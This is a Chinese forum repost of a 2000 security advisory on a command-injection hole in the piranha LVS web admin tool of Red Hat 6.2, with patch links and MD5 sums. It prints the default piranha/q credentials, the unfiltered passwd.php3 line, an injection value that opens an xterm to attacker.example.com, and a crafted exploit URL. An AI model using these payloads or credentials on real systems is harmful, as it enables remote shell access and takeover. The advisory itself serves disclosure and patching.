发信人: williamlong()
整理人: williamlong(2000-05-09 12:52:10), 站内信件
|
piranha是一个GUI界面的工具,用于监控,配置和管理LVS cluster。Redha t 6.2的piranha-0.4.12安装包支持基于web的php3来保护基本的授权认证。并且 提供一个默认的帐号,如果能够知道就可以允许远程用户改变piranha的密码和执 行任意的命令,注意问题存在于passwd.php3脚本中。
piranha-0.4.12安装包,存在两个基本的问题,可能导致攻击者获得shell接 入。由于早期版本只是单纯的GUI界面,而没有基于web的管理界面,所以不存在 该漏洞。
第一个问题是保护管理脚本的默认的帐号和密码存在。 ISS称之为"backdoo r" ,其实只是一般默认的用户名和密码而已。
默认的用户名/密码都是: piranha/q
第二个问题是用户改变密码的passwd.php3脚本默认安装在/home/httpd/htm l/piranha/secure目录中。在web中是:http://victim.example.com/piranha/s ecure/passwd.php3一旦认证通过, 将会弹出一个表格要求输入新的密码。通过之 后,由于没有过滤机制,可能近一步获得shell命令权限。分析该文件如下:
passwd.php3:
echo "<TD>The passwords you supplied match<BR>";
$temp = `/usr/bin/htpasswd -b passwords piranha $try1`;
这将允许创建其它新密码。例如:
g23 ;/usr/X11R6/bin/xterm -display attacker.example.com:0 -ut;
那么构建该URL就应该如下:
http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touc h+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=AC CEPT
x86 RH 6.2用户升级补丁如下:
rpm -Fvh 文件名
Red Hat Linux 6.2:
intel:
ftp://updates.redhat.com/6.2/i386/piranha-0.4.14-1.i386.rpm
ftp://updates.redhat.com/6.2/i386/piranha-docs-0.4.14-1.i386.rpm
ftp://updates.redhat.com/6.2/i386/piranha-gui-0.4.14-1.i386.rpm
alpha:
ftp://updates.redhat.com/6.2/alpha/piranha-0.4.14-1.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/piranha-docs-0.4.14-1.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/piranha-gui-0.4.14-1.alpha.rpm
sparc:
ftp://updates.redhat.com/6.2/sparc/piranha-0.4.14-1.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/piranha-docs-0.4.14-1.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/piranha-gui-0.4.14-1.sparc.rpm
sources:
ftp://updates.redhat.com/6.2/SRPMS/piranha-0.4.14-1.src.rpm
MD5校验值如下:
MD5 sum Package Name
---------------------------------------------------------------------- -----
7c9cad243857f3e90cb73457619ad3a0 6.2/SRPMS/piraanha-0.4.14-1.src.rpm
179e502f88f149fe3bfb285af851a6d3 6.2/alpha/piranha-0.4.14-1.alpha.rpm
881622bc6403c2af38834c0deaf05d44 6.2/alpha/piranha-docs-0.4.14-1.alpha .rpm
7ffc63ec6f236afc0b19298ec29e6774 6.2/alpha/piranha-gui-0.4.14-1.alpha. rpm
1e04357c0ebb004185b834152667c644 6.2/i386/piranha-0.4.14-1.i386.rpm
5b6649f14979e1b2fbdb763d88e9a3ac 6.2/i386/piranha-docs-0.4.14-1.i386.r pm
1a49816f280dc7a9b83ba9bab42a247f 6.2/i386/piranha-gui-0.4.14-1.i386.rp m
4153b861f030a17745463c1749732b58 6.2/sparc/piranha-0.4.14-1.sparc.rpm
dc964993d9a3b6c967e5c4455bc24221 6.2/sparc/piranha-docs-0.4.14-1.sparc .rpm
97071e07e2f34fecf80ba48f61e70ba6 6.2/sparc/piranha-gui-0.4.14-1.sparc. rpm
-- ☆ 蓝色月光 ☆ http://williamlong.163.net
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 61.128.129.3]
|
|